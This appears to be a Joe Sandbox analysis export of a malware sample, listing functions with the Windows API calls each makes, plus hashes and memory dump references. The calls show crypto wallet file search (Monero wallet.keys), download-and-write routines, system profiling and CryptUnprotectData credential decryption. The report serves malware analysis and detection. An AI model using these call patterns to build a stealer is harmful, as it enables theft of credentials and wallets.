Function 0034DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003614B0,00360C2A), ref: 0034DAEB
StrCmpCA.SHLWAPI(?,003614B4), ref: 0034DB33
StrCmpCA.SHLWAPI(?,003614B8), ref: 0034DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0034DDCC
FindClose.KERNEL32(000000FF), ref: 0034DDDE

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: c2c36b485c3f9b595e2ac0e0ea32dad4d5298f9c241e465757dde505378766d9
Instruction ID: 97bf038507ed816fb7f7d0ac91f2505cfde2451640cfd5611cc48b797141a90b
Opcode Fuzzy Hash: c2c36b485c3f9b595e2ac0e0ea32dad4d5298f9c241e465757dde505378766d9
Instruction Fuzzy Hash: C491747290060497CB16FBB0EC56DED777CAF98301F408659FD0A9E151EE34AB0D9B92

Function 003460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

InternetOpenA.WININET(00360DF7,00000001,00000000,00000000,00000000), ref: 0034610F
StrCmpCA.SHLWAPI(?,0136E5D0), ref: 00346147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0034618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003461B3
InternetReadFile.WININET(?,?,00000400,?), ref: 003461DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0034620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00346249
InternetCloseHandle.WININET(?), ref: 00346253
InternetCloseHandle.WININET(00000000), ref: 00346260

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: efb2a714b250a0dc6706d83f6d36095f39c8fc16af705feee883e7cfd7e4dcfb
Instruction ID: 0e3c3e5d475eea7ae4e93f83946964e61bb5da4f2cd9f3ec79dfd71f73ba8cf8
Opcode Fuzzy Hash: efb2a714b250a0dc6706d83f6d36095f39c8fc16af705feee883e7cfd7e4dcfb
Instruction Fuzzy Hash: 95519470900208ABEB21DF60CC46BEE77B8FB44701F108599BA05BB1C0DBB46A89DF56

Function 00357B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

GetKeyboardLayoutList.USER32(00000000,00000000,003605AF), ref: 00357BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00357BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00357C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00357C62
LocalFree.KERNEL32(00000000), ref: 00357D22

Strings

/ , xrefs: 00357C7F

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
Instruction ID: 9666f6d0d2da6f650ceb0f5366fcfd7c4a407eed8eec851a26380b3d228e3f21
Opcode Fuzzy Hash: 057319130775246f392211097fff77174c7d56e16d2607d3a70751c8e2dd8bc6
Instruction Fuzzy Hash: BB416F71940218ABDB25DB94DC89FEEB7B8FF44701F1042D9E809661A0DB342F89DFA1

Function 0034E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00360D73), ref: 0034E4A2
StrCmpCA.SHLWAPI(?,003614F8), ref: 0034E4F2
StrCmpCA.SHLWAPI(?,003614FC), ref: 0034E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0034EBDF

Strings

\*.*, xrefs: 0034E44D

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: fd798d52c037af4013af4e10579778a011c22b3b519a148b265d5b5221da20be
Instruction ID: bd99af1c764b13050292e4e42d58e7bbb33be44c4de7270e73a9c6b8cc054bb4
Opcode Fuzzy Hash: fd798d52c037af4013af4e10579778a011c22b3b519a148b265d5b5221da20be
Instruction Fuzzy Hash: 581264319105189ADB16FB60DC96EED7778BF54301F404299B90AAA0A1FF306F4DEF92

Function 00359600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0035961E
Process32First.KERNEL32(00360ACA,00000128), ref: 00359632
Process32Next.KERNEL32(00360ACA,00000128), ref: 00359647
StrCmpCA.SHLWAPI(?,00000000), ref: 0035965C
CloseHandle.KERNEL32(00360ACA), ref: 0035967A

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
Instruction ID: f1356414889b343083a51e497c3b00fefbaccb9f85040f5b90a263b534831446
Opcode Fuzzy Hash: dc5b5e4e0479a63d829bb8ff8ed4c4a63d13ac3596c1278522377fdc98eb28c9
Instruction Fuzzy Hash: 61014C75A00208EBDB11DFA4CC48FEDB7F8EB18311F10418AAD06A7250D7349B48DF51

Function 00357A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0136DDA8,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357A63
RtlAllocateHeap.NTDLL(00000000), ref: 00357A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0136DDA8,00000000,?,00360E10,00000000,?,00000000,00000000,?), ref: 00357A7D
wsprintfA.USER32 ref: 00357AB7

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
Instruction ID: 80d00f46cc3b92038be748f0a790f86011bd52bcb779cd57212ec67c17de5865
Opcode Fuzzy Hash: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
Instruction Fuzzy Hash: 4B115EB1D45218EBEB208B54DC49FAAB778FB04721F10439AEE1AA32D0D7745A48CF51

Function 00349B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
LocalFree.KERNEL32(?), ref: 00349BD3

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 67cd3bcccf9f3a662c190cdd7c0e3d8b0c01ce8b6c64db45c1aa16b56daeb2a0
Instruction ID: a15b39500c0fe4d648d937ab7562fbd3c88526a2cfe084ac9414477ffbf6d845
Opcode Fuzzy Hash: 67cd3bcccf9f3a662c190cdd7c0e3d8b0c01ce8b6c64db45c1aa16b56daeb2a0
Instruction Fuzzy Hash: 5311E8B4A00209DFDB04DF94D985AAE77B5FB88300F104599EC15A7350D774AE10CF61

Function 00357850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
RtlAllocateHeap.NTDLL(00000000), ref: 00357887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
